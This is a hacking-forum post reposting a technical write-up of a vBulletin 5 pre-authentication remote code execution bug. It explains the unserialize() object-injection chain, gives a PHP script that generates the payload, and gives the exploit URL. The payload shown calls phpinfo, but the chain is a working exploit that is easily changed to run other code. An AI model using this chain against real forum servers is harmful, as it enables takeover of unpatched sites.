HackerTop - View topic - vBulletin 5 PreAuth RCE Exploit
View unanswered posts | View active topics It is currently Sat Mar 23, 2019 11:17 am



Reply to topic  [ 1 post ] 
 vBulletin 5 PreAuth RCE Exploit 
Author Message
Site Admin
User avatar

Joined: Sun Jul 24, 2016 6:44 am
Posts: 18
Reply with quote
by @_cutz


As came to my attention a guy named Coldzer0 is selling a vBulletin RCE expoit on http://0day.today.
In his video he exploited several vBulletin boards while surfing on Google... This ended in the vBulletin main forum being pwned on monday (11/02/15).

vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php:
Code:
   public function decodeArguments($arguments)
   {
      if ($args = @unserialize($arguments))
      {
         $result = '';

         foreach ($args AS $varname => $value)
         {
            $result .= $varname;

Apart from the obvious unserialize() not much else happening there -- luckily we have in /core/vb/db/result.php:
Code:
class vB_dB_Result implements Iterator
{
...
   public function rewind()
   {
      //no need to rerun the query if we are at the beginning of the recordset.
      if ($this->bof)
      {
         return;
      }

      if ($this->recordset)
      {
         $this->db->free_result($this->recordset);
      }

rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php:
abstract class vB_Database
Code:
{
...   
   function free_result($queryresult)
   {
      $this->sql = '';
      return @$this->functions['free_result']($queryresult);
   }

Which gives easy RCE. Setup objects accordingly:


Code:
$ php << 'eof'
<?php
class vB_Database {
       public $functions = array();

       public function __construct()
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

Just surf to:
Code:
Code:
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years.


Sun Jul 24, 2016 9:28 am
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB